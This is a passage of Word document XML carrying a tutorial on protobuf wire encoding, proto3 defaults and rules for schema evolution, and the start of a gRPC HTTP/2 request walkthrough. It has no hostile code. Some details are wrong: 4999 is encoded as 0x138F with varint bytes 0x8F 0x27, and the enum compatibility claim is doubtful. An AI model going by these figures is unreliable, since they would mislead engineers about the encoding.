      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        0x0A 0x03 55 53 44  (5 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A411FB4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Field 2 (units = 4999):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A3699" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        0x10 0x8F 0x27       (varint 4999 = 0x138F → split: 0x8F 0x27, 3 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BD6F3E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Total: ~14 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666140F6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C061A59" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Total message size: ~34 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512DA145" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5E90C535" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>JSON equivalent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EA66BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25740407" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "id": "ord_123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECB5030" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "user_id": "usr_456",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D044DE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "status": "ORDER_STATUS_CONFIRMED",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE9CD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "total": {"currency_code": "USD", "units": 4999, "nanos": 0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503B3AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A10F04D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DFAEDD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON size: ~120 bytes (3.5× larger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E44158C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FB7DB7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  At scale: 1M messages/second, 86 bytes savings each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F12B802" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    86 bytes × 1M/s = 86MB/s bandwidth savings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A1F76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    86MB/s × 86,400s/day = 7.4TB/day bandwidth savings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4705B9B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    AWS bandwidth: ~$0.09/GB → $666/day savings → $243,000/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2CF77" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proto3 default values and backward compatibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CDD93B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B136D7A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Proto3 defaults (field omitted in encoding when equal to default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035B87EA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string: "" (empty string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6979BE06" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  number: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7BD7D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  bool: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014A0B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  enum: first value (must be 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626629C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  message: null/nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D9209" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  repeated: empty list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B81579" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751C9141" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Implication: cannot distinguish "field not set" from "field set to default"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FD63B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Solution: use wrapper types or optional fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE691E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A776C5C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Proto3 optional (added in proto3 with optional keyword):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284D66B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  optional int32 age = 1;  // field_has_value() distinguishes set from default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D22AE46" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56848061" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Or wrapper types (google/protobuf/wrappers.proto):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343DF7FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  google.protobuf.Int32Value age = 1;  // null = not set, 0 = explicitly zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F43DB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="09BB0313" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Backward compatibility rules (CRITICAL for production):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6671B390" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330275FA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  SAFE changes (old code reads new messages, new code reads old messages):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074C96C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Add new fields (new code sees them, old code ignores them)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5FE04B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Add new enum values (old code sees 0/default for unknown values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C6F98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Change field from singular to repeated (old code reads first element)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1F119" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B2A32" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  UNSAFE changes (break compatibility):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009E790A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Remove fields (break clients using those fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9622F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Change field type (breaks serialization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC734C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Change field number (field 1 in new proto read as field 1 in old proto — wrong type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114037DF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Rename fields (in proto3: names don't affect binary, but JSON encoding breaks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC125E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F498E5E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field number reuse: NEVER reuse deleted field numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E78D68" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Old clients may have cached binary data with old field number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75289FC7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Reserve deleted numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32867CB2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A859D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    message Order {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D94C6C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      reserved 3, 7, 15;                    // reserved field numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9AAC1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      reserved "old_field", "deprecated";   // reserved field names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9BCFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1563F155" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      string id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362DFEEE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      // ... rest of fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D99BB04" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA85807" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E45DAA3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Evolution strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E16DBD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Deprecate: mark field with [deprecated=true] annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BD34A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Reserve: after all clients stop using the field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11257961" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Delete: only after reservation is in place</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE3A41" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="4EF1D7A4">
          <v:rect id="_x0000_i6618" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FDBC68" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. gRPC — The Complete Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C31D819" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The gRPC Architecture — From HTTP/2 to Method Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BE34A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The complete request flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B6E2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E2AD4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E0499" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  stub.GetOrder(GetOrderRequest{order_id: "ord_123"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853258A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D415AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Step 1: Generated stub serializes request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5028BF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GetOrderRequest → Protobuf binary → []byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D38093D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Serialization: ~1-10µs for typical messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C7720D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F5788" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Step 2: gRPC channel constructs HTTP/2 request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DCB16" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2 HEADERS frame:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E4B3D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    :method: POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3A5A1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    :scheme: https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B860015" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    :path: /orders.v1.OrderService/GetOrder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE035D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    :authority: api.example.com:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93E98B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    content-type: application/grpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67733C8E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    content-encoding: identity (or gzip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7033B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc-timeout: 5S (5 second deadline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73BAA3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc-encoding: identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBCEA4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    te: trailers (required for gRPC trailer support)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C331BC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    authorization: Bearer {jwt}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557D010" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    x-request-id: {uuid}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D5DCB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8034D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2 DATA frame:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4077DAF8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    5-byte gRPC message framing prefix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51184524" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Byte 0: 0x00 (compressed flag: 0=not compressed, 1=compressed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B21693F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
